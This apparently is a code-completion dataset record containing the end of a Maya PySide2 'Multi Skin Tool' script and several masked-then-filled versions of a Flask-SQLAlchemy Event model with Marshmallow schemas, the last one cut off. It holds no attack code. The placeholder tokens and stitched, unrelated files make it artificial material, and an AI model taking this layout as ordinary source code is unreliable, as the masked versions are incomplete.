searchBarEdited(self):\n matchCase = bool(self.matchCaseChx.checkState())\n query = self.searchBar.text()\n if matchCase:\n query_words = str(query).split(' ')\n else:\n query_words = str(query).lower().split(' ')\n query_words = filter(None, query_words)\n scoreList = {}\n for item in [str(x) for x in self.filterList]:\n score = 0\n for query_word in query_words:\n if matchCase:\n if query_word in item:\n score += 1\n elif query_word in item.lower():\n score += 1\n scoreList[item] = score\n sorted_matches = [i for i in scoreList.items() if i[1] >= len(\n query_words)]\n sorted_matches = sorted(sorted_matches, key=lambda x: x[0])\n sorted_matches_string = [name for name, index in sorted_matches]\n self.meshTreeWidget.clear()\n self.populateQTree(sorted_matches_string)\n\n def populateQTree(self, filterList):\n self.roots = [QtWidgets.QTreeWidgetItem(self.meshTreeWidget, [str(\n item)]) for item in filterList]\n [root.setIcon(0, QtGui.QIcon(':/out_mesh.png')) for root in self.roots]\n [root.setExpanded(True) for root in self.roots]\n self.QtShapes = []\n shape_dic = self.getAllShapes(self.getAllMeshes())\n QTroots_dic = {}\n for root in self.roots:\n try:\n QTroots_dic.update({root: shape_dic[root.text(0)]})\n except KeyError:\n pass\n for QTroot, shapesList in QTroots_dic.items():\n [QtWidgets.QTreeWidgetItem(QTroot, [str(shape)]) for shape in\n shapesList]\n child_count = QTroot.childCount()\n children = [QTroot.child(index) for index in range(child_count)]\n [child.setForeground(0, QtGui.QBrush(QtGui.QColor(YELLOW))) for\n child in children]\n [child.setIcon(0, QtGui.QIcon(':/out_transform.png')) for child in\n children]\n [child.setExpanded(True) for child in children]\n [self.QtShapes.append(child) for child in children]\n self.QTClusters = []\n cluster_dic = self.getSkinClusterbyShape(flatList(shape_dic.values()))\n QTshape_dic = {}\n for shape in self.QtShapes:\n QTshape_dic.update({shape: cluster_dic[shape.text(0)]})\n for QTshape, clusterList in QTshape_dic.items():\n if clusterList == 'None':\n pass\n else:\n QtWidgets.QTreeWidgetItem(QTshape, [str(clusterList)])\n child_count = QTshape.childCount()\n children = [QTshape.child(index) for index in range(child_count)]\n [child.setForeground(0, QtGui.QBrush(QtGui.QColor(GREEN))) for\n child in children]\n [child.setIcon(0, QtGui.QIcon(':/cluster.png')) for child in\n children]\n [self.QTClusters.append(child) for child in children]\n bindJoints_dic = self.getBindJointsFromCluster([x for x in\n cluster_dic.values() if x != 'None'])\n QTcluster_dic = {}\n for cluster in self.QTClusters:\n QTcluster_dic.update({cluster: bindJoints_dic[cluster.text(0)]})\n for QTCluster, jointList in QTcluster_dic.items():\n [QtWidgets.QTreeWidgetItem(QTCluster, [str(jnt)]) for jnt in\n jointList]\n child_count = QTCluster.childCount()\n children = [QTCluster.child(index) for index in range(child_count)]\n [child.setForeground(0, QtGui.QBrush(QtGui.QColor(DARKRED))) for\n child in children]\n [child.setIcon(0, QtGui.QIcon(':/out_joint.png')) for child in\n children]\n\n def closeTree(self, type='mesh'):\n if type == 'mesh':\n [root.setExpanded(False) for root in self.roots]\n elif type == 'shape':\n [shape.setExpanded(False) for shape in self.QtShapes]\n elif type == 'skin cluster':\n [sclus.setExpanded(False) for sclus in self.QTClusters]\n\n def expandTree(self, type='mesh'):\n if type == 'mesh':\n [root.setExpanded(True) for root in self.roots]\n elif type == 'shape':\n [shape.setExpanded(True) for shape in self.QtShapes]\n elif type == 'skin cluster':\n [sclus.setExpanded(True) for sclus in self.QTClusters]\n\n def showSelected(self):\n selection = pm.selected()\n selection.sort()\n self.meshTreeWidget.clear()\n self.populateQTree(selection)\n\n def singleClickedAction(self):\n mySelection = self.meshTreeWidget.selectedItems()\n str_selected = [x.text(0) for x in mySelection]\n pm.select(str_selected, r=1)\n\n def filterMeshes(self, filter='all'):\n \"\"\"\n filter:\n all : all meshes\n skinClusters : all meshes with skinClusters\n None\n \"\"\"\n if filter == 'all':\n return self.getAllMeshes()\n elif filter == 'skinClusters':\n clusters = pm.ls(type='skinCluster')\n meshesShapes = set(sum([pm.skinCluster(c, q=1, geometry=1) for\n c in clusters], []))\n meshes = set([x.getParent() for x in meshesShapes if pm.\n objectType(x) == 'mesh'])\n return meshes\n elif filter == 'None':\n return None\n\n @staticmethod\n def test():\n print('test')\n\n @staticmethod\n def getSkinCluster(_transform):\n \"\"\"\n Find a SkinCluster from a transform\n Returns the skinCluster node\n \"\"\"\n result = []\n if not pm.objExists(_transform):\n return result\n validList = mel.eval('findRelatedDeformer(\"' + str(_transform) + '\")')\n if validList is None:\n return result\n for elem in validList:\n if pm.nodeType(elem) == 'skinCluster':\n result.append(elem)\n pm.select(result, r=True)\n result_node = pm.selected()\n if len(result_node) > 1:\n return result_node\n else:\n try:\n return result_node[0]\n except IndexError:\n return False\n\n @staticmethod\n def getBindJointsFromCluster(clusterList):\n \"\"\"\n Find all joints attached to a skinCluster\n @param clusterList: List. list of skin Clusters\n return dic with key: skin Cluster. Value: list of joint \n \"\"\"\n bindJoints_dic = {}\n for cluster in clusterList:\n all_binds_jnts = [x for x in pm.listConnections(str(cluster) +\n '.matrix[*]', s=1)]\n bindJoints_dic.update({str(cluster): all_binds_jnts})\n return bindJoints_dic\n\n @staticmethod\n def getAllMeshes():\n \"\"\"\n return: list of all meshes / geometry\n \"\"\"\n shapesList = pm.ls(type='mesh', ni=1)\n transformList = list(set(pm.listRelatives(shapesList, parent=True)))\n transformList.sort()\n return transformList\n\n @staticmethod\n def getAllShapes(transforms):\n \"\"\"\n @param transforms: List. \n return : dictionnary with key:mesh / values: shapes\n \"\"\"\n shapes_dic = {}\n for transform in transforms:\n all_shapes = pm.PyNode(transform).getShapes(ni=True)\n shapes_dic.update({str(transform): all_shapes})\n return shapes_dic\n\n def getSkinClusterbyShape(self, shapes):\n \"\"\"\n get skinCluster attached to the shape\n @param shapes: List\n return: List\n \"\"\"\n cluster_dic = {}\n for shape in shapes:\n try:\n incoming = mc.listConnections('{}.inMesh'.format(shape))[0]\n if pm.objectType(incoming) == 'skinCluster':\n cluster_dic.update({str(shape): incoming})\n else:\n skinCluster = self.getSkinCluster(shape)\n if skinCluster:\n if len(skinCluster) > 1:\n cluster_dic.update({str(shape): 'None'})\n else:\n cluster_dic.update({str(shape): skinCluster})\n else:\n cluster_dic.update({str(shape): 'None'})\n except TypeError:\n cluster_dic.update({str(shape): 'None'})\n return cluster_dic\n\n\ndef showUI(dialog=False):\n if dialog:\n MultiSkin_UI.show_dialog()\n else:\n global tools_cw_ui\n try:\n tools_cw_ui.deleteLater()\n except:\n pass\n tools_cw_ui = MultiSkin_UI()\n tools_cw_ui.show()\n",
"step-5": "from functools import wraps\n\nimport maya.cmds as mc\nimport maya.mel as mel\nimport pymel.core as pm\nfrom PySide2 import QtCore, QtGui, QtWidgets\n\nimport adb_core.Class__multi_skin as ms\nimport adbrower\nfrom CollDict import pysideColorDic as pyQtDic\nfrom maya.app.general.mayaMixin import MayaQWidgetDockableMixin\nimport adb_tools.adb_pyQt.Class__rightClickCustom as adbRC\nfrom maya_script import Adbrower\n\nadb = adbrower.Adbrower()\n\nVERSION = 1.0\n\nPATH_WINDOW = Adbrower.PATH_WINDOW_INIT + 'AppData/Roaming'\nPATH_LINUX = Adbrower.PATH_LINUX_INIT\nFOLDER_NAME = Adbrower.FOLDER_NAME_INIT\nICONS_FOLDER = Adbrower.ICONS_FOLDER_INIT\n\nYELLOW = '#ffe100'\nORANGE = '#fd651d'\nGREEN = '#597A59'\nDARKRED = '#745a54'\n\ndef undo(func):\n ''' \n Puts the wrapped `func` into a single Maya Undo action, then\n undoes it when the function enters the finally: block\n from schworer Github\n '''\n @wraps(func)\n def _undofunc(*args, **kwargs):\n try:\n # start an undo chunk\n mc.undoInfo(ock=True)\n return func(*args, **kwargs)\n finally:\n # after calling the func, end the undo chunk\n mc.undoInfo(cck=True)\n return _undofunc\n\n\ndef flatList(ori_list=''):\n \"\"\"\n Flatten a list\n \"\"\"\n flat_list = []\n for item in ori_list:\n if isinstance(item, list):\n for sub_item in item:\n flat_list.append(sub_item)\n else:\n flat_list.append(item)\n return flat_list\n\n#-----------------------------------\n# CLASS\n#----------------------------------- \n\n\nclass MultiSkin_UI(MayaQWidgetDockableMixin, QtWidgets.QDialog):\n __dialog = None\n \n @classmethod\n def show_dialog(cls):\n if cls.__dialog is None:\n cls.__dialog = cls()\n else:\n cls.__dialog.raise_() \n cls.__dialog.show()\n \n def __init__(self,parent=None): \n super(MultiSkin_UI, self).__init__(parent=parent)\n \n self.meshTreeWidget=QtWidgets.QTreeWidget()\n \n self.setObjectName('multi skin ui')\n self.starting_height = 500\n self.starting_width = 390\n self.setWindowTitle('adbrower - Multi Skin Tool' + ' v' + str(VERSION))\n self.setWindowFlags(QtCore.Qt.Tool)\n self.setMinimumWidth(self.starting_width)\n self.resize(self.starting_width, self.starting_height)\n \n # -----------------------------\n # --- Create scrollArea\n\n self.mainBox = QtWidgets.QVBoxLayout()\n self.mainBox.setContentsMargins(0, 0, 0, 0)\n self.scroll_layout = QtWidgets.QScrollArea()\n\n self.mainBox.addWidget(self.scroll_layout)\n self.setLayout(self.mainBox)\n self.scroll_layout.setContentsMargins(0, 0, 0, 0)\n\n self.scroll_layout.setWidgetResizable(True)\n self.scroll_layout.setFrameStyle(QtWidgets.QFrame.NoFrame)\n self.scroll_layout.setFrameShadow(QtWidgets.QFrame.Plain)\n\n self.scroll_widget = QtWidgets.QWidget()\n self.scroll_layout.setWidget(self.scroll_widget) \n \n # -----------------------------\n # --- Main Layout\n\n self.main_layout = QtWidgets.QVBoxLayout()\n self.main_layout.setContentsMargins(*[5] * 4)\n self.main_layout.setSpacing(2)\n self.setLayout(self.main_layout)\n\n self.scroll_widget.setLayout(self.main_layout)\n self.widgetsAndLayouts()\n self.create_Button()\n self.buildMainLayout()\n\n\n def widgetsAndLayouts(self):\n\n # --------- Predefine widgets\n\n def addLine():\n line = QtWidgets. QFrame()\n line.setFrameShape(QtWidgets.QFrame.HLine)\n return line\n\n def addText(message, alignement=QtCore.Qt.AlignCenter, height=30, bold=False):\n myFont = QtGui.QFont()\n myFont.setBold(bold)\n text = QtWidgets.QLabel(message)\n text.setAlignment(alignement)\n text.setFixedHeight(height)\n text.setFont(myFont)\n return text \n \n # ------------------------------\n #--------- Layouts\n\n self.vLayoutAndFunctions = [\n # name, margins\n ['treeWidget', [1, 1, 1, 1]],\n ]\n self.vlayout = {}\n for layoutName, margins, in self.vLayoutAndFunctions:\n self.vlayout[layoutName] = QtWidgets.QVBoxLayout()\n self.vlayout[layoutName].setContentsMargins(margins[0], margins[1], margins[2], margins[3],) \n \n self.hLayoutAndFunctions = [\n # name, margins\n ['filterOptions', [1, 1, 1, 1]],\n ['buttonsOptions', [1, 1, 1, 1]],\n ['searchBarWidget', [1, 1, 1, 1]],\n ]\n self.hlayout = {}\n for layoutName, margins, in self.hLayoutAndFunctions:\n self.hlayout[layoutName] = QtWidgets.QHBoxLayout()\n self.hlayout[layoutName].setContentsMargins(margins[0], margins[1], margins[2], margins[3],) \n \n # ------------------------------\n # --------- QLINE EDIT WIDGET\n\n self.searchBar = QtWidgets.QLineEdit()\n self.searchBar.setPlaceholderText('Search...')\n self.searchBar.textEdited.connect(self.searchBarEdited)\n self.hlayout['searchBarWidget'].addWidget(self.searchBar) \n \n # ------------------------------\n # --------- CHECKBOX WIDGET\n \n self.matchCaseChx = QtWidgets.QCheckBox()\n self.matchCaseChx.setChecked(False)\n self.matchCaseChx.setText('Match Case')\n self.matchCaseChx.stateChanged.connect(self.searchBarEdited)\n \n # ------------------------------\n # --------- RADIO BUTTON WIDGET\n \n self.allFilter = QtWidgets.QRadioButton('All', self)\n self.allFilter.setChecked(True)\n self.allFilter.toggled.connect(self.refreshQtree)\n\n self.skinClusterFilter = QtWidgets.QRadioButton('Skin Clusters', self)\n self.skinClusterFilter.setChecked(True)\n self.skinClusterFilter.toggled.connect(self.refreshQtree)\n \n # ------------------------------\n # --------- TREE LIST WIDGET\n\n self.meshTreeWidget=QtWidgets.QTreeWidget()\n\n self.meshTreeWidget.setHeaderLabel('Cloth Tree View')\n self.meshTreeWidget.setSelectionMode(self.meshTreeWidget.ExtendedSelection)\n \n self.vlayout['treeWidget'].addWidget(self.meshTreeWidget)\n header = QtWidgets.QTreeWidgetItem([\"Geometries\"])\n self.meshTreeWidget.setHeaderItem(header)\n \n self.meshTreeWidget.itemClicked.connect(self.singleClickedAction)\n self.meshTreeWidget.itemSelectionChanged .connect(self.singleClickedAction)\n \n self.refreshQtree()\n \n def create_Button(self):\n \"\"\" Create the buttons \"\"\"\n self.buttonAndFunctions = [\n # name, function , group number, labelColor, backgroundColor, layout, layout_coordinate width\n ['Show Selected', self.showSelected, 0, pyQtDic['colorLightGrey'], '', self.hlayout['searchBarWidget'], '', 30],\n ['Refresh', self.refreshQtree, 0, pyQtDic['colorLightGrey'], '', self.hlayout['filterOptions'], '', 30],\n ['Clear', self.meshTreeWidget.clear, 0, pyQtDic['colorLightGrey'], '', self.hlayout['filterOptions'], '', 30],\n \n ['Expand All', self.expandTree, 0, pyQtDic['colorLightGrey'], '', self.hlayout['buttonsOptions'], '', 30],\n ['Close All', self.closeTree, 0, pyQtDic['colorLightGrey'], '', self.hlayout['buttonsOptions'], '', 30],\n ]\n\n # Build Buttons\n self.buttons = {}\n for buttonName, buttonFunction, _, labColor, bgColor, layout, layout_coord, width, in self.buttonAndFunctions:\n self.buttons[buttonName] = adbRC.CustomQPushButton(buttonName)\n self.buttons[buttonName].clicked.connect(buttonFunction) \n try:\n layout.addWidget(self.buttons[buttonName], int(layout_coord.split(',')[0]), int(layout_coord.split(',')[1]))\n except ValueError:\n layout.addWidget(self.buttons[buttonName])\n\n # add Right Clicked Options\n _optionsExpandAll = self.buttons['Expand All'].addButtonActions(['Shapes', 'Skin Clusters'])\n _optionsExpandAll['Shapes'].triggered.connect(lambda:self.expandTree('shape'))\n _optionsExpandAll['Skin Clusters'].triggered.connect(lambda:self.expandTree('skin cluster'))\n \n _optionsCloseAll = self.buttons['Close All'].addButtonActions(['Shapes', 'Skin Clusters'])\n _optionsCloseAll['Shapes'].triggered.connect(lambda:self.closeTree('shape'))\n _optionsCloseAll['Skin Clusters'].triggered.connect(lambda:self.closeTree('skin cluster'))\n\n\n def buildMainLayout(self):\n # ------------------------------\n # --------- BUILD MAIN LAYOUT \n \n self.main_layout.addLayout(self.hlayout['filterOptions'])\n self.hlayout['filterOptions'].addWidget(self.allFilter)\n self.hlayout['filterOptions'].addWidget(self.skinClusterFilter)\n self.hlayout['filterOptions'].addStretch()\n \n self.main_layout.addLayout(self.hlayout['searchBarWidget'])\n self.hlayout['searchBarWidget'].addWidget(self.matchCaseChx)\n self.main_layout.addLayout(self.hlayout['buttonsOptions'])\n self.main_layout.addLayout(self.vlayout['treeWidget'])\n\n\n# ==================================\n# SLOTS\n# ================================== \n\n def refreshQtree(self):\n self.meshTreeWidget.clear()\n all_status = self.allFilter.isChecked()\n if all_status:\n _filter = 'all'\n else:\n _filter = 'skinClusters'\n self.filterList = self.filterMeshes(filter=_filter)\n self.populateQTree(self.filterList)\n \n def getSearchBarText(self):\n searchBarText = self.searchBar.text()\n return searchBarText\n \n def searchBarEdited(self):\n matchCase=bool(self.matchCaseChx.checkState())\n query = self.searchBar.text()\n if matchCase:\n query_words = str(query).split(\" \")\n else:\n query_words = str(query).lower().split(\" \")\n query_words = filter(None, query_words)\n scoreList = {}\n \n for item in [str(x) for x in self.filterList]:\n score = 0\n for query_word in query_words:\n if matchCase:\n if query_word in item:\n score += 1\n else:\n if query_word in item.lower():\n score += 1\n scoreList[item] = score\n\n # If user enter more than one words, get only result with a score at least equal to the number of words in the query\n sorted_matches = [i for i in scoreList.items() if i[1] >= len(query_words)]\n \n # Sort matches by score\n sorted_matches = sorted(sorted_matches, key=lambda x: x[0])\n sorted_matches_string = [name for name, index in sorted_matches]\n \n self.meshTreeWidget.clear()\n self.populateQTree(sorted_matches_string)\n \n\n def populateQTree(self, filterList):\n # Meshes\n # ----------------------\n \n self.roots = [QtWidgets.QTreeWidgetItem(self.meshTreeWidget, [str(item)]) for item in filterList]\n [root.setIcon(0, QtGui.QIcon(':/out_mesh.png')) for root in self.roots]\n [root.setExpanded(True) for root in self.roots]\n \n # Shapes\n # ----------------------\n self.QtShapes = []\n shape_dic = self.getAllShapes(self.getAllMeshes())\n QTroots_dic = {} # Keys are Qtree object\n for root in self.roots:\n try:\n QTroots_dic.update({root:shape_dic[root.text(0)]})\n except KeyError:\n pass\n \n # added the shapes under there mesh\n for QTroot, shapesList in QTroots_dic.items():\n [QtWidgets.QTreeWidgetItem(QTroot, [str(shape)]) for shape in shapesList]\n \n # changed their color\n child_count=QTroot.childCount()\n children=[QTroot.child(index) for index in range(child_count)]\n [child.setForeground(0, QtGui.QBrush(QtGui.QColor(YELLOW))) for child in children] \n [child.setIcon(0, QtGui.QIcon(':/out_transform.png')) for child in children] \n [child.setExpanded(True) for child in children] \n [self.QtShapes.append(child) for child in children]\n \n # skinClusters\n # ----------------------\n self.QTClusters = [] \n \n cluster_dic = self.getSkinClusterbyShape(flatList(shape_dic.values()))\n QTshape_dic = {}\n for shape in self.QtShapes:\n QTshape_dic.update({shape:cluster_dic[shape.text(0)]})\n \n # added the skinCluster under there shape\n for QTshape, clusterList in QTshape_dic.items():\n if clusterList == 'None':\n pass\n else:\n QtWidgets.QTreeWidgetItem(QTshape, [str(clusterList)]) \n \n # changed their color\n child_count=QTshape.childCount()\n children=[QTshape.child(index) for index in range(child_count)]\n [child.setForeground(0, QtGui.QBrush(QtGui.QColor(GREEN))) for child in children] \n [child.setIcon(0, QtGui.QIcon(':/cluster.png')) for child in children] \n [self.QTClusters.append(child) for child in children] \n \n # Joints\n # ---------------------- \n bindJoints_dic = self.getBindJointsFromCluster([x for x in cluster_dic.values() if x != 'None'])\n \n QTcluster_dic = {}\n for cluster in self.QTClusters:\n QTcluster_dic.update({cluster:bindJoints_dic[cluster.text(0)]})\n \n for QTCluster, jointList in QTcluster_dic.items():\n [QtWidgets.QTreeWidgetItem(QTCluster, [str(jnt)]) for jnt in jointList]\n \n # changed their color\n child_count=QTCluster.childCount()\n children=[QTCluster.child(index) for index in range(child_count)]\n [child.setForeground(0, QtGui.QBrush(QtGui.QColor(DARKRED))) for child in children] \n [child.setIcon(0, QtGui.QIcon(':/out_joint.png')) for child in children] \n \n def closeTree(self, type='mesh'):\n if type == 'mesh':\n [root.setExpanded(False) for root in self.roots]\n elif type == 'shape':\n [shape.setExpanded(False) for shape in self.QtShapes]\n elif type == 'skin cluster':\n [sclus.setExpanded(False) for sclus in self.QTClusters]\n\n def expandTree(self, type='mesh'):\n if type == 'mesh':\n [root.setExpanded(True) for root in self.roots]\n elif type == 'shape':\n [shape.setExpanded(True) for shape in self.QtShapes]\n elif type == 'skin cluster':\n [sclus.setExpanded(True) for sclus in self.QTClusters]\n \n def showSelected(self):\n selection = pm.selected()\n selection.sort()\n self.meshTreeWidget.clear()\n self.populateQTree(selection)\n \n def singleClickedAction(self):\n mySelection = self.meshTreeWidget.selectedItems()\n str_selected = [x.text(0) for x in mySelection]\n pm.select(str_selected, r=1)\n \n def filterMeshes(self, filter = 'all'):\n \"\"\"\n filter:\n all : all meshes\n skinClusters : all meshes with skinClusters\n None\n \"\"\"\n if filter =='all':\n return self.getAllMeshes()\n\n elif filter == \"skinClusters\":\n clusters = pm.ls(type='skinCluster')\n meshesShapes = set(sum([pm.skinCluster(c, q=1, geometry=1) for c in clusters], []))\n meshes = set([x.getParent() for x in meshesShapes if pm.objectType(x) == 'mesh'])\n return meshes\n \n elif filter == 'None':\n return None\n \n \n# ==================================\n# STATIC METHOD\n# ================================== \n \n @staticmethod\n def test():\n print ('test')\n\n @staticmethod\n def getSkinCluster(_transform):\n \"\"\"\n Find a SkinCluster from a transform\n Returns the skinCluster node\n \"\"\"\n result = []\n if not (pm.objExists(_transform)):\n return result\n validList = mel.eval('findRelatedDeformer(\"' + str(_transform) + '\")')\n if validList is None:\n return result\n for elem in validList:\n if pm.nodeType(elem) == 'skinCluster':\n result.append(elem)\n pm.select(result, r=True)\n result_node = pm.selected()\n \n if len(result_node) > 1:\n return result_node\n else:\n try:\n return result_node[0]\n except IndexError:\n return False\n\n @staticmethod\n def getBindJointsFromCluster(clusterList):\n \"\"\"\n Find all joints attached to a skinCluster\n @param clusterList: List. list of skin Clusters\n return dic with key: skin Cluster. Value: list of joint \n \"\"\"\n bindJoints_dic = {}\n for cluster in clusterList:\n all_binds_jnts = [x for x in pm.listConnections(str(cluster) + '.matrix[*]', s=1)]\n bindJoints_dic.update({str(cluster):all_binds_jnts})\n return bindJoints_dic\n \n @staticmethod\n def getAllMeshes():\n \"\"\"\n return: list of all meshes / geometry\n \"\"\"\n shapesList = pm.ls(type=\"mesh\", ni=1)\n transformList = list(set(pm.listRelatives(shapesList ,parent=True)))\n transformList.sort()\n return transformList\n \n @staticmethod\n def getAllShapes(transforms):\n \"\"\"\n @param transforms: List. \n return : dictionnary with key:mesh / values: shapes\n \"\"\"\n shapes_dic = {}\n for transform in transforms:\n all_shapes = pm.PyNode(transform).getShapes(ni=True)\n shapes_dic.update({str(transform):all_shapes}) \n return shapes_dic\n \n \n def getSkinClusterbyShape(self, shapes):\n \"\"\"\n get skinCluster attached to the shape\n @param shapes: List\n return: List\n \"\"\"\n cluster_dic = {}\n for shape in shapes: \n try:\n incoming = mc.listConnections('{}.inMesh'.format(shape))[0]\n if pm.objectType(incoming) == 'skinCluster':\n cluster_dic.update({str(shape):incoming})\n else:\n skinCluster = self.getSkinCluster(shape)\n if skinCluster:\n if len(skinCluster) > 1:\n cluster_dic.update({str(shape):'None'})\n else:\n cluster_dic.update({str(shape):skinCluster}) \n else:\n cluster_dic.update({str(shape):'None'}) \n except TypeError:\n cluster_dic.update({str(shape):'None'})\n return cluster_dic\n\n \n \n# ===============================\n# BUILD WINDOW\n# ===============================\n\n\ndef showUI(dialog = False):\n if dialog:\n MultiSkin_UI.show_dialog()\n else: \n # Make sure the UI is deleted before recreating\n global tools_cw_ui\n try:\n tools_cw_ui.deleteLater()\n except:\n pass\n tools_cw_ui = MultiSkin_UI()\n tools_cw_ui.show()\n \n \n \n# showUI()\n",
"step-ids": [
17,
18,
23,
24,
28
]
}
|
[
17,
18,
23,
24,
28
] |
<|reserved_special_token_0|>
class Event(db.Model):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class EventSchema(ma.Schema):
class Meta:
fields = ('id', 'name', 'venue', 'location_lat', 'location_long',
'date_created', 'start_time', 'duration', 'coordinator_name',
'coordinator_contact', 'status_id', 'org_id', 'description')
<|reserved_special_token_0|>
class EventFullInfoSchema(ma.Schema):
event = ma.Nested(event_schema)
admin = ma.Nested(admin_limited_schema)
status = ma.Nested(event_status_schema)
org_unit = ma.Nested(org_unit_schema)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Event(db.Model):
__tablename__ = 'event'
__table_args__ = ForeignKeyConstraint(['status_id'], ['event_status.id']
), ForeignKeyConstraint(['org_id'], ['org_unit.id']
), ForeignKeyConstraint(['created_by'], ['admin.id'])
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(45), nullable=False)
venue = db.Column(db.String(45), nullable=False)
location_lat = db.Column(db.Float, nullable=False)
location_long = db.Column(db.Float, nullable=False)
date_created = db.Column(db.DateTime, nullable=False, default=datetime.now)
start_time = db.Column(db.DateTime, nullable=False)
duration = db.Column(db.Float, nullable=False)
coordinator_name = db.Column(db.String(45), nullable=False)
coordinator_contact = db.Column(db.Integer, nullable=False)
status_id = db.Column(db.Integer, nullable=False)
org_id = db.Column(db.Integer, nullable=False)
created_by = db.Column(db.Integer, nullable=False)
description = db.Column(db.String(500), nullable=False)
def __init__(self, name, venue, location_lat, location_long, start_time,
duration, coordinator_name, coordinator_contact, status_id, org_id,
created_by, description):
self.name = name
self.venue = venue
self.location_lat = location_lat
self.location_long = location_long
self.start_time = start_time
self.duration = duration
self.coordinator_name = coordinator_name
self.coordinator_contact = coordinator_contact
self.status_id = status_id
self.org_id = org_id
self.created_by = created_by
self.description = description
class EventSchema(ma.Schema):
class Meta:
fields = ('id', 'name', 'venue', 'location_lat', 'location_long',
'date_created', 'start_time', 'duration', 'coordinator_name',
'coordinator_contact', 'status_id', 'org_id', 'description')
<|reserved_special_token_0|>
class EventFullInfoSchema(ma.Schema):
event = ma.Nested(event_schema)
admin = ma.Nested(admin_limited_schema)
status = ma.Nested(event_status_schema)
org_unit = ma.Nested(org_unit_schema)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Event(db.Model):
__tablename__ = 'event'
__table_args__ = ForeignKeyConstraint(['status_id'], ['event_status.id']
), ForeignKeyConstraint(['org_id'], ['org_unit.id']
), ForeignKeyConstraint(['created_by'], ['admin.id'])
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(45), nullable=False)
venue = db.Column(db.String(45), nullable=False)
location_lat = db.Column(db.Float, nullable=False)
location_long = db.Column(db.Float, nullable=False)
date_created = db.Column(db.DateTime, nullable=False, default=datetime.now)
start_time = db.Column(db.DateTime, nullable=False)
duration = db.Column(db.Float, nullable=False)
coordinator_name = db.Column(db.String(45), nullable=False)
coordinator_contact = db.Column(db.Integer, nullable=False)
status_id = db.Column(db.Integer, nullable=False)
org_id = db.Column(db.Integer, nullable=False)
created_by = db.Column(db.Integer, nullable=False)
description = db.Column(db.String(500), nullable=False)
def __init__(self, name, venue, location_lat, location_long, start_time,
duration, coordinator_name, coordinator_contact, status_id, org_id,
created_by, description):
self.name = name
self.venue = venue
self.location_lat = location_lat
self.location_long = location_long
self.start_time = start_time
self.duration = duration
self.coordinator_name = coordinator_name
self.coordinator_contact = coordinator_contact
self.status_id = status_id
self.org_id = org_id
self.created_by = created_by
self.description = description
class EventSchema(ma.Schema):
class Meta:
fields = ('id', 'name', 'venue', 'location_lat', 'location_long',
'date_created', 'start_time', 'duration', 'coordinator_name',
'coordinator_contact', 'status_id', 'org_id', 'description')
event_schema = EventSchema()
events_schema = EventSchema(many=True)
class EventFullInfoSchema(ma.Schema):
event = ma.Nested(event_schema)
admin = ma.Nested(admin_limited_schema)
status = ma.Nested(event_status_schema)
org_unit = ma.Nested(org_unit_schema)
event_with_full_schema = EventFullInfoSchema()
events_with_full_schema = EventFullInfoSchema(many=True)
<|reserved_special_token_1|>
from database import db
from database import ma
from datetime import datetime
from sqlalchemy import ForeignKeyConstraint
from models.admin import Admin, admin_limited_schema
from models.event_status import EventStatus, event_status_schema
from models.org_unit import org_unit_schema
class Event(db.Model):
__tablename__ = 'event'
__table_args__ = ForeignKeyConstraint(['status_id'], ['event_status.id']
), ForeignKeyConstraint(['org_id'], ['org_unit.id']
), ForeignKeyConstraint(['created_by'], ['admin.id'])
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(45), nullable=False)
venue = db.Column(db.String(45), nullable=False)
location_lat = db.Column(db.Float, nullable=False)
location_long = db.Column(db.Float, nullable=False)
date_created = db.Column(db.DateTime, nullable=False, default=datetime.now)
start_time = db.Column(db.DateTime, nullable=False)
duration = db.Column(db.Float, nullable=False)
coordinator_name = db.Column(db.String(45), nullable=False)
coordinator_contact = db.Column(db.Integer, nullable=False)
status_id = db.Column(db.Integer, nullable=False)
org_id = db.Column(db.Integer, nullable=False)
created_by = db.Column(db.Integer, nullable=False)
description = db.Column(db.String(500), nullable=False)
def __init__(self, name, venue, location_lat, location_long, start_time,
duration, coordinator_name, coordinator_contact, status_id, org_id,
created_by, description):
self.name = name
self.venue = venue
self.location_lat = location_lat
self.location_long = location_long
self.start_time = start_time
self.duration = duration
self.coordinator_name = coordinator_name
self.coordinator_contact = coordinator_contact
self.status_id = status_id
self.org_id = org_id
self.created_by = created_by
self.description = description
class EventSchema(ma.Schema):
class Meta:
fields = ('id', 'name', 'venue', 'location_lat', 'location_long',
'date_created', 'start_time', 'duration', 'coordinator_name',
'coordinator_contact', 'status_id', 'org_id', 'description')
event_schema = EventSchema()
events_schema = EventSchema(many=True)
class EventFullInfoSchema(ma.Schema):
event = ma.Nested(event_schema)
admin = ma.Nested(admin_limited_schema)
status = ma.Nested(event_status_schema)
org_unit = ma.Nested(org_unit_schema)
event_with_full_schema = EventFullInfoSchema()
events_with_full_schema = EventFullInfoSchema(many=True)
<|reserved_special_token_1|>
from database import db
from database import ma
from datetime import datetime
from sqlalchemy import ForeignKeyConstraint
from models.admin import Admin, admin_limited_schema
from models.event_status import EventStatus, event_status_schema
from models.org_unit import org_unit_schema
class Event(db.Model):
# class corresponding to the event table in the database
__tablename__ = 'event'
__table_args__ = (
ForeignKeyConstraint(['status_id'], ['event_status.id']),
ForeignKeyConstraint(['org_id'], ['org_unit.id']),
ForeignKeyConstraint(['created_by'], ['admin.id']),
)
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(45), nullable=False)
venue = db.Column(db.String(45), nullable=False)
location_lat = db.Column(db.Float, nullable=False)
location_long = db.Column(db.Float, nullable=False)
date_created = db.Column(db.DateTime, nullable=False, default=datetime.now)
start_time = db.Column(db.DateTime, nullable=False)
duration = db.Column(db.Float, nullable=False)
coordinator_name = db.Column(db.String(45), nullable=False)
coordinator_contact = db.Column(db.Integer, nullable=False)
status_id = db.Column(db.Integer, nullable=False)
org_id = db.Column(db.Integer, nullable=False)
